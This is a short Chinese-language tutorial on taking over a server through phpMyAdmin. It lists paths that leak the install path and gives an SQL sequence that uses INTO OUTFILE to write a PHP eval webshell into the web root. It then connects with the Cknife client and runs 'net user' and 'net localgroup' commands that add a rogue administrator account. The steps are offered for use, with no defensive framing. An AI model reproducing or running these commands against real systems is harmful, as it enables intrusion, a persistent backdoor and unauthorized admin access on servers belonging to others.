下面由phpmyadmin教程栏目给大家介绍利用phpMyAdmin提权的方法,希望对需要的朋友有所帮助!
利用phpMyAdmin提权
爆路径
- /phpmyadmin/libraries/lect_lang.lib.php
- /phpMyAdmin/index.php?lang[]=1
- /phpMyAdmin/phpinfo.php
- /load_file()
- /phpmyadmin/themes/darkblue_orange/layout.inc.php
- /phpmyadmin/libraries/select_lang.lib.php
- /phpmyadmin/libraries/lect_lang.lib.php
- /phpmyadmin/libraries/mcrypt.lib.php
得到物理路径 C:\\wamp\\www\\phpmyadmin\\themes\\darkblue_orange\\layout.inc.php
写马
Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES("<?php eval($_POST[Cknife]);?>"); select cmd from a into outfile "C:/wamp/www/phpmyadmin/d.php"; Drop TABLE IF EXISTS a;
获得webshell
最后用Cknife连接,创建帐户并添加到管理员用户组net user admin admin /add
net localgroup administrator admin /add
以上就是怎么利用phpMyAdmin提权的详细内容,更多请关注主题君其它相关文章!
-=||=-收藏赞 (0)
不要再留垃圾评论了,主题君整理资源不容易,留几句鼓励的话吧。